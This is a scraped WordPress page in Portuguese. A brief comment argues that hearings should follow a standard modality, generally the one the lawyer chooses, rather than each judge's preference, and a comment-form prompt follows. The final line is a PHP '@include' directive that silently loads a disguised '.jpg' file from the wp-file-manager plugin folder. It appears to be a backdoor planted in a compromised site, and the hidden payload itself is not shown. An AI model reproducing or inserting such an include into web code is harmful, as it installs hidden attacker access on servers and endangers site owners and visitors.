Deve haver um padrão, evitando-se que cada juiz decida a modalidade da audiência. Em regra deveria ser respeitada a escolha do advogado.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

@include "wp-content/plugins/wp-file-manager/lib/php/editors/OnlineConvert/include/0168.jpg";